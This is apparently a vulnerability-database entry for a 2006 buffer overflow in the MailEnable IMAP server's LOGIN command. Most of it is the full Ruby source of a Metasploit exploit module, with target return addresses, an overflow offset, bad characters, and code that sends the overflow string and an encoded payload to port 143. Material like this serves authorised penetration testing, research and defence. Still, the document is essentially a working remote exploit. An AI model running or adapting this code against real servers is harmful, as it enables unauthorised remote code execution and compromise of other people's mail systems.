MailEnable IMAPD (2.34/2.35) Login Request Buffer Overflow

2006-12-11T19:21:17
ID MSF:EXPLOIT/WINDOWS/IMAP/MAILENABLE_LOGIN
Type metasploit
Reporter Rapid7
Modified 2017-07-24T13:26:21

Description

MailEnable's IMAP server contains a buffer overflow vulnerability in the Login command.

                                        
                                            ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'MailEnable IMAPD (2.34/2.35) Login Request Buffer Overflow',
      'Description'    => %q{
          MailEnable's IMAP server contains a buffer overflow
        vulnerability in the Login command.
      },
      'Author'         => [ 'MC' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2006-6423'],
          [ 'OSVDB', '32125'],
          [ 'BID', '21492']
        ],
      'Privileged'     => true,
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      'Payload'        =>
        {
          'Space'    => 450,
          'BadChars' => "\x00\x0a\x0d\x20",
          'StackAdjustment' => -3500,
        },
      'Platform'       => 'win',
      'Targets'        =>
        [

          [ 	'MailEnable 2.35 Pro',
            {
              'Ret' =>  0x10049abb,
            }
          ], #MEAISP.DLL

          [ 	'MailEnable 2.34 Pro',
            {
              'Ret' =>  0x76095d68,
              'Offset' => 556,
            }
          ], #push esp #  ret  | ascii {PAGE_EXECUTE_READ} [MSVCP60.dll]
        ],
      'DisclosureDate' => 'Dec 11 2006',
      'DefaultTarget' => 0))

    register_options( [ Opt::RPORT(143) ])
  end

  def exploit
    connect

    auth	=   "a001 LOGIN " + rand_text_alpha_upper(4) + " {10}\r\n"
    sploit	=   rand_text_alpha_upper(556) + [target.ret].pack('V')
    sploit	<<  payload.encoded + "\r\n\r\n"

    res = sock.recv(50)
      if ( res =~ / OK IMAP4rev1/)
        print_status("Trying target #{target.name}...")
        sock.put(auth)
        sock.get_once(-1, 3)
        sock.put(sploit)
      else
        print_status("Not running IMAP4rev1...")
      end

    handler
    disconnect
  end
end